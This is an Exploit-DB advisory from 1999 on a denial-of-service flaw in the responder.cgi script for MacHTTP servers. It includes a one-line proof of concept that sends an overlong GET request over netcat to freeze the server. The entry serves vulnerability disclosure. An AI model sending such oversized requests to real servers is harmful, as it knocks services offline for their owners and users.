John O'Fallon Responder.cgi 1.0 DoS Vulnerability

1999-04-09T00:00:00
ID EDB-ID:21048
Type exploitdb
Reporter Epic
Modified 1999-04-09T00:00:00

Description

John O'Fallon Responder.cgi 1.0 DoS Vulnerability. Dos exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/3155/info

responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products.

It is possible to cause a denial of service to MacHTTP webserver due to improper bounds checking in the script 'responder.cgi'. HTTP GET requests with an excessive number of characters will cause the server to freeze.

The webserver will need to be restarted to regain normal functionality. 

$ echo "GET
/cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc
machttp-server.com 80